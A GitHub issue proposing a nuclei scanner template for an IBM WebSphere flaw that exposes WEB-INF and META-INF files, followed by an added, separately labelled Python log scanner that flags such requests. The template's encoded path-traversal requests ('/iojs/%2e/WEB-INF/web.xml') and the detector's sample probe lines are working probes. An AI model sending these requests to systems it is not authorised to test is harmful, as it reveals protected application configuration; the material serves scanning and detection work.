projectdiscovery / nuclei-templates

Community curated list of templates for the nuclei engine to find security vulnerabilities.
https://github.com/projectdiscovery/nuclei
MIT License

IBM WebSphere application source file exposure #7274

Closed letfornz closed 1 year ago

letfornz commented 1 year ago

Template Information:

This nuclei template discloses application-specific files contained within the WAR file, including files under the WEB-INF and META-INF directories.

Reference

Nuclei Template:

id: ibm-websphere-exposure

info:
  name: IBM WebSphere application source file exposure
  author: r3nz0
  severity: medium
  description: Disclose application specific files contained within the war file, including files under the web-inf and meta-inf directories
  tags: ibm,websphere,exposure

requests:
  - method: GET
    path:
      - "{{BaseURL}}/iojs/%2e/WEB-INF/web.xml"
      - "{{BaseURL}}/iojs/%2e/WEB-INF/"
      - "{{BaseURL}}/iojs/%2e/META-INF/"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "web-app"
          - "context-param"
        condition: and

      - type: status
        status:
          - 200
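
A defensive counterpart to the template above, as an added example that is not part of the original issue or the nuclei-templates project: it scans access-log lines for requests whose path, once percent-encoding and dot segments are undone, resolves into WEB-INF or META-INF. The combined log format, the sample entries and all function names are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote

PROTECTED = {"web-inf", "meta-inf"}  # directories a servlet container should never serve
# Request target and status from a combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')

# Constructed sample entries (documentation IP ranges), not taken from the report.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:00 +0000] "GET /iojs/%2e/WEB-INF/web.xml HTTP/1.1" 200 1832',
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /iojs/%252e/META-INF/ HTTP/1.1" 404 210',
    '198.51.100.7 - - [01/Jan/2024:10:00:02 +0000] "GET /iojs/index.jsp?next=/WEB-INF/ HTTP/1.1" 200 512',
    '198.51.100.7 - - [01/Jan/2024:10:00:03 +0000] "GET /docs/web-inf-guide.html HTTP/1.1" 200 900',
]

def canonical_segments(raw_path, max_rounds=3):
    """Undo nested percent-encoding, then collapse '.' and '..' segments."""
    path = raw_path
    for _ in range(max_rounds):
        decoded = unquote(path)
        if decoded == path:
            break
        path = decoded
    # Drop ';param' suffixes and treat backslashes as separators.
    parts = [seg.split(";", 1)[0] for seg in path.replace("\\", "/").split("/")]
    normalized = posixpath.normpath("/" + "/".join(parts).lstrip("/"))
    return [seg.lower() for seg in normalized.split("/") if seg]

def classify(line):
    """Return a finding if the request path resolves into a protected directory."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    raw_path = m["target"].split("?", 1)[0]  # the query string is not a path
    hit = PROTECTED.intersection(canonical_segments(raw_path))
    if not hit:
        return None
    return {
        "directory": sorted(hit)[0],
        "encoded": unquote(raw_path) != raw_path,  # percent-escapes were present
        # A 200 suggests content was returned and the response needs review.
        "verdict": "served" if m["status"] == "200" else "probe",
        "path": raw_path,
    }

def scan(lines):
    return [finding for finding in map(classify, lines) if finding]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

Matching on whole path segments after normalization keeps the last two sample entries out of the results: one mentions WEB-INF only in the query string, the other only as part of a file name.
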
letfornz commented 1 year ago

I was rewarded with this report, but it has not been made public. This is the only evidence I have of the vulnerability.

https://github.com/projectdiscovery/nuclei-templates/assets/85194811/0cf86c5f-22e9-40ea-9d25-50eaabcd1f9f

princechaddha commented 1 year ago

Hi @letfornz, Thank you for taking the time to create this issue and for contributing to this project 🍻

The team will shortly validate and format it correctly before raising a PR. Thank you!